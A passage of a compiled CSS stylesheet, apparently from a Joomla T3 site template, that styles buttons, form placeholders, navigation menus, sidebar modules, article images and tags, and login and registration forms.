}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #ff8800;
  border-bottom-color: #ff8800;
}
.nav a:hover .caret {
  border-top-color: #b35f00;
  border-bottom-color: #b35f00;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #ff8800;
  border-color: #e67a00;
}
.navbar-default .navbar-text {
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #ffffff;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #e67a00;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #e67a00;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #e67a00;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #cc6d00;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffffff;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #cc6d00;
    border-top: 1px solid #b35f00;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #b35f00;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffffff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #e67a00;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #e67a00;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #e67a00;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #ff8800;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #b35f00;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #b35f00;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #ff8800;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #ff8800;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #b35f00;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #b35f00;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: left;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-left: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-right: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-right: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-right: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
